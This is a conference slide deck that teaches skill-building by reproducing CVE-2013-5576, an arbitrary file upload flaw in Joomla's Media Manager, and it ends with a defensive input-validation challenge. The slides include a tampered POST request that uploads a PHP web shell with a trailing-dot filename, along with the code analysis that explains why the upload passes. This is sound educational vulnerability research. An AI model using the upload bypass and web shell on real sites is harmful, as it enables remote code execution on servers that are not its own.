SlideShare a Scribd company logo

Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs

S
Sandra Escandor-O'Keefe

Abstract: In order to improve our skills, we can revisit past CVEs and create our own exploits, and compare with existing exploits. By practicing in this manner, we can eventually contribute to the wider security community. The part of this exercise that is the most useful is when we find a difference with our own developed exploit compared against a current existing exploit. We must practice our critical thinking skills to determine the discrepancies, and determine if any unstated assumptions exist. This talk will consist of looking at a specific CVE (CVE-2013-5576) to explain: The general strategy and thought process for practicing by revisiting past CVEs; The vulnerability, its context, and why the code that is responsible for the functionality produces the vulnerability.; A technique for determining the code responsible for the vulnerability.; The differences found when running a current known exploit against the vulnerability, and the debugging methods used.; The differences between our developed exploit and a current known exploit.

Technology
1 of 35
Climbing the InfoSec Skill Tree Image courtesy of Wikipedia Climb the infosec skill tree by revisiting past CVEs Sandra Escandor-O’Keefe Security Engineer at Fastly s3scand0r
Climbing the InfoSec Skill Tree ● What’s In It For You? ● A Suggested Strategy ● Fundamental Concept Trees ● CVE-2013-5576 As Example ● Revisiting Ideas Related to CVE ● Conclusion Talk Outline
Climbing the InfoSec Skill Tree Motivation From: Andreas Vesalius' Fabrica, published in 1543 There’s more problems to solve in information security than there are people to solve them. We need a continuous source of fresh brains to solve these problems
Climbing the InfoSec Skill Tree ● Major benefit: Helps you to look at concepts with fresh eyes ● Structuring a mentorship relationship is a challenge ○ This talk can help you get an idea of how to structure such a relationship For (Potential) Mentors
Climbing the InfoSec Skill Tree Skill Builder sees: ● Path is hazy ● A CVE, but how was reasoning developed? For Skill Builders This way leads to technical mastery
Climbing the InfoSec Skill Tree Reproduce CVE findings A Suggested Approach
Climbing the InfoSec Skill Tree ● Reproduction leads to deeper understanding: ○ The system where vulnerability lies ○ Vulnerability and why it’s there ○ Where does system tend to be vulnerable? ○ Technical fundamental concepts Motivation for the Skill Builder
Climbing the InfoSec Skill Tree ● Inspired by “How to Read a Paper” by S.Keshav ○ Three pass approach to research paper reading ● CVE findings are essentially research findings but they may or may not have formal paper associated with them General Strategy
Climbing the InfoSec Skill Tree ● First pass: Quick glance ● Second pass: ○ Set up a test environment ○ Get feel for structure of segment of vulnerable code ● Third pass: Look at the details General Approach
Climbing the InfoSec Skill Tree Ask: ● What tools do you think were used to find the vulnerability? ● What are the fundamental concepts related to this vulnerability? (i.e, client-server architecture; communication protocol specifics, like HTTP) ● How would you classify this vulnerability? ● How would you set up a test environment? First Pass
Climbing the InfoSec Skill Tree Examine, but not in too much detail: ● Diff of fix vs. vulnerable code ○ Get feel for structure of surrounding code where vulnerability exists ● Set up a test environment Second Pass
Climbing the InfoSec Skill Tree ● Attempt to hit vulnerability w/o using existing exploit ○ Manual experimentation? ○ Write a script? ○ Other existing tools? (e.g tamper data) ● Think about why vulnerability exists ● Create Fundamental Concepts Tree Third Pass
Climbing the InfoSec Skill Tree ● Run current existing exploit afterwards ● If running current existing exploit was not smooth, debug until it runs well ○ Make notes of what you needed to change ○ Equivalent to Keshav’s “You should identify and challenge every assumption in every statement” Third Pass cont’d
Climbing the InfoSec Skill Tree Borrowing from Sid Meier’s Alpha Centauri: Create a fundamental concepts tree Third Pass cont’d.
Climbing the InfoSec Skill Tree Fundamental Concepts Tree CVE-2013-5576 Client-Server Model HTTP Headers HTTP Protocol OSI Model Input Validation Vulnerabilitie s Arbitrary Code Execution Absolute and Relative Pathnames File System Structure File System Permissions Arbitrary File Uploads
Climbing the InfoSec Skill Tree Allows us to: ● Reflect on what we learned ○ Where do we lack understanding? ● Help others learn Fundamental Concepts Trees
Climbing the InfoSec Skill Tree ● Bug reported to Joomla! by Verasafe ● Joomla Media Manager component vuln. ● Arbitrary file upload vulnerability ● Results in arbitrary code execution ● Affected: Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions Introducing CVE-2013-5576
Climbing the InfoSec Skill Tree After first pass, what did I do? ● Created test environment ● Diff vulnerable code with Fixed code ● Manual test for vulnerability w/o original exploit ● Examined what makes the code vulnerable ● Examined original exploit in detail CVE-2013-5576 as Example
Climbing the InfoSec Skill Tree Test Environment Details ● On VM: Ubuntu 64-bit 12.04.5 (Ubuntu Precise) ● PHP 5.3.10-1ubuntu3.26 ● Apache 2.2.22 (Ubuntu) ● Followed installation instructions for Joomla 3.1.4 Stable (Ember) CVE-2013-5576 as Example, cont’d.
Climbing the InfoSec Skill Tree CVE-2013-5576 as Example, cont’d. Vulnerable Code Fixed Code if (!in_array($format, $allowable) && !in_array($format, $ignored)) if ($format == '' || $format == false || (!in_array($format, $allowable) && !in_array($format, $ignored))) $format = strtolower(JFile::getExt($file[‘name’])); … if (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): Fix: Extra condition added Key condition: If this is true, then upload is NOT allowed If filename extension is not in $allowable AND if filename extension is not in $ignored, then don’t allow upload
Climbing the InfoSec Skill Tree ● Used Tamper Data browser plugin ● Modified filename passed to server by experimenting ○ Based on filename strings that I’ve seen before that cause issues, i.e) “*.*”, “.*”, etc. ○ Watch response behavior CVE-2013-5576 Manual Testing
Climbing the InfoSec Skill Tree CVE-2013-5576 Manual Testing, cont’d Original POST data (regular request) New POST data ----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="Filedata[]"; filename="shell.php"rnContent-Type: application/x- phprnrn<?phpnsystem($_SERVER['HTTP_ACCEP T_LANGUAGE']);n?>nrn----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="folder"rnrnrn---------- ------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="return- url"rnrnaW5kZXgucGhwP29wdGlvbj1jb21fbWVkaW E=rn----------------------------- 112817922114815867397460213--rn ----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="Filedata[]"; filename="shell.php.*"rnContent-Type: application/x- phprnrn<?phpnsystem($_SERVER['HTTP_ACCEP T_LANGUAGE']);n?>nrn----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="folder"rnrnrn---------- ------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="return- url"rnrnaW5kZXgucGhwP29wdGlvbj1jb21fbWVkaW E=rn----------------------------- 112817922114815867397460213--rn “.*” added here Create an administrator type user, log in, and use the “Media Manager” option to upload a file. Before uploading the file, set Tamper Data to start the tamper.
Climbing the InfoSec Skill Tree ● We know that $format is problematic (from diffing fixed vs. vulnerable code) ● Examine how $format is generated, see JFile::getExt (in libraries/joomla/filesystem/file.php) Why Does Vulnerability Occur? $format = strtolower(JFile::getExt($file[‘name’])); … If (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called by canUpload(..)):
Climbing the InfoSec Skill Tree What I initially assumed: Why Does Vulnerability Occur? cont’d. Tamper data POST request modified $file = “shell.php.*” In JFile getExt: $format = strtolower(JFile::getExt($file[‘name’])); … If (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called in canUpload(..)): 0 1 2 3 4 5 6 7 8 9 10 11 s h e l l . p h p . * 0 For PHP’s substr, see: github.com/php/php- src/blob/master/ext/standard/string.c PHP’s substr should give back “*”
Climbing the InfoSec Skill Tree In reality: Why Does Vulnerability Occur? cont’d. Use Tamper data to modify POST request $file = “shell.php.” In JFile getExt: ZSTR_LEN(str) = 9 f = 10 (this is $dot above) Then the following condition is met: If (f > (zend_long) ZSTR_LEN(str)){ RETURN_FALSE; } Working through PHP_FUNCTION(substr) 0 1 2 3 4 5 6 7 8 9 10 s h e l l . p h p . 0 For PHP’s substr, see: github.com/php/php- src/blob/master/ext/standard/string.c PHP’s substr returns FALSE JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called by canUpload(..)): Joomla Filename cleanup $file = “shell.php.” $dot = 9 + 1 = 10 FALSE returned
Climbing the InfoSec Skill Tree Why Does Vulnerability Occur? cont’d. $format = strtolower(JFile::getExt($file[‘name’])); $allowable = explode(‘,’, $upload_extensions); $ignored = explode(‘,’, $ignore_extensions); If (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called in canUpload(..)): getExt returns FALSE => $format = ‘’ (empty str) $allowable is an array of accepted file extensions. !in_array($format, $allowable) => TRUE (i.e extension is NOT allowed) $ignored: Because textbox input is empty, after explode, Array( [0]=> ) - it is an array with one element with value of ‘’ therefore $format is in it. !in_array($format, $ignored) => FALSE (i.e our file extension can be allowed to pass through $ignored is an array of ext’s to let pass through. Default install: $ignore_extensions empty str TRUE && FALSE => FALSE :. File upload allowed
Climbing the InfoSec Skill Tree In reality: Why Does Vulnerability Occur? cont’d. Use Tamper data to modify POST request $file = “shell.php.” In JFile getExt: 0 1 2 3 4 5 6 7 8 9 10 s h e l l . p h p . 0 For PHP’s substr, see: github.com/php/php- src/blob/master/ext/standard/string.c Joomla Filename cleanup JFile::makesafe filters out: Any two or more consecutive “.” (i.e “..”, “...”) (.){2,} Any character that is not alphanumeric, a “.”, a “_”, or a “-”, or a single space [^A-Za-z0-9.-_ ] Any single “.” at the beginning ^. shell.php.* shell.php.
Climbing the InfoSec Skill Tree Given findings of manual tests, initial PoC: ● Had trailing “.*” ○ Analysis of vuln afterwards showed this trailing “*” was unnecessary (i.e, only trailing “.” is needed for exploitation) Comparing CVE-2013-5576 Exploits
Climbing the InfoSec Skill Tree ● Linux filenames are just a sequence of bytes that can’t contain 0x00 or 0x2F (slash (‘/’))(Source: http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_170) ○ Therefore, “webshell.php.” is a valid filename ● It’s worth exploring C source code of PHP, especially for standard string functions, e.g substr, strrpos ○ We can miss a lot, esp. edge cases by only looking at documentation CVE-2013-5576 Takeaways
Climbing the InfoSec Skill Tree Image courtesy of Wikipedia Some Additional Things To Think About
Climbing the InfoSec Skill Tree ● LangSec - a defense method ○ Proposed by Meredith L. Patterson, Sergey Bratus, and Dan Hirsch @ Brucon ‘12 ○ Any processing of untrusted input should have a formal language to define valid input ○ The input handler should be a “recognizer” for that valid input ○ Big concept here: Finite State Machines Revisiting Ideas Related to CVE
Climbing the InfoSec Skill Tree Example: Only process binary number with even number of 0s Revisiting Ideas Related to CVE Image By Cepheus - Own work, Public Domain, https://commons.wikimedia.org/w/index.php?curid=1234893 Input Accept State Further processing can safely be done on data only if finite state machine is in accept state after input processed
Climbing the InfoSec Skill Tree What modifications can you make to Joomla 3.1.4 in order to create a recognizer for the Joomla Media Manager component, such that it recognizes valid filenames and only allows processing of those? Take-home Challenge
Climbing the InfoSec Skill Tree ● A suggested approach for the Skill Builder ● Creating fundamental concept trees to help you and others ● Showed an example thought process through a CVE ● Revisited Ideas Related to CVE Shown:
Climbing the InfoSec Skill Tree Image courtesy of Wikipedia Thanks for listening

Recommended

Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 

Recommended

Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
mimikatz @ rmll
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmllBenjamin Delpy
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Puppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsPuppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsNicolas Corrarello
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the EmpireWill Schroeder
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Controlenigma0x3
 
Shytikov on NTLM Authentication
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authenticationshytikov
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
Threat Modeling: Applied on a Publish-Subscribe Architectural Style
Threat Modeling: Applied on a Publish-Subscribe Architectural StyleThreat Modeling: Applied on a Publish-Subscribe Architectural Style
Threat Modeling: Applied on a Publish-Subscribe Architectural StyleDharmalingam Ganesan
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 

More Related Content

What's hot

End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Puppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsPuppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsNicolas Corrarello
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Controlenigma0x3
 
Shytikov on NTLM Authentication
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authenticationshytikov
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
Threat Modeling: Applied on a Publish-Subscribe Architectural Style
Threat Modeling: Applied on a Publish-Subscribe Architectural StyleThreat Modeling: Applied on a Publish-Subscribe Architectural Style
Threat Modeling: Applied on a Publish-Subscribe Architectural StyleDharmalingam Ganesan
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 

What's hot (20)

mimikatz @ rmll
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmll
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Puppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsPuppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on Windows
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the Empire
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Not a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account ControlNot a Security Boundary: Bypassing User Account Control
Not a Security Boundary: Bypassing User Account Control
 
Shytikov on NTLM Authentication
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authentication
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradication
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
Threat Modeling: Applied on a Publish-Subscribe Architectural Style
Threat Modeling: Applied on a Publish-Subscribe Architectural StyleThreat Modeling: Applied on a Publish-Subscribe Architectural Style
Threat Modeling: Applied on a Publish-Subscribe Architectural Style
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 

Similar to Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs

Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 
Zend framework 03 - singleton factory data mapper caching logging
Zend framework 03 - singleton factory data mapper caching loggingZend framework 03 - singleton factory data mapper caching logging
Zend framework 03 - singleton factory data mapper caching loggingTricode (part of Dept)
 
Questions On The Code And Core Module
Questions On The Code And Core ModuleQuestions On The Code And Core Module
Questions On The Code And Core ModuleKatie Gulley
 
Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423
Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423
Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423Giulio Vian
 
Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 3camp
 
Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.Nelson Gomes
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Symfony finally swiped right on envvars
Symfony finally swiped right on envvarsSymfony finally swiped right on envvars
Symfony finally swiped right on envvarsSam Marley-Jarrett
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetAchieve Internet
 
It's a Dangerous World
It's a Dangerous World It's a Dangerous World
It's a Dangerous World MongoDB
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to TestZsolt Fabok
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleNCC Group
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 

Similar to Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs (20)

Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 
Zend framework 03 - singleton factory data mapper caching logging
Zend framework 03 - singleton factory data mapper caching loggingZend framework 03 - singleton factory data mapper caching logging
Zend framework 03 - singleton factory data mapper caching logging
 
Questions On The Code And Core Module
Questions On The Code And Core ModuleQuestions On The Code And Core Module
Questions On The Code And Core Module
 
Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423
Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423
Infrastructure as Code in your CD pipelines - London Microsoft DevOps 0423
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2
 
Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.
 
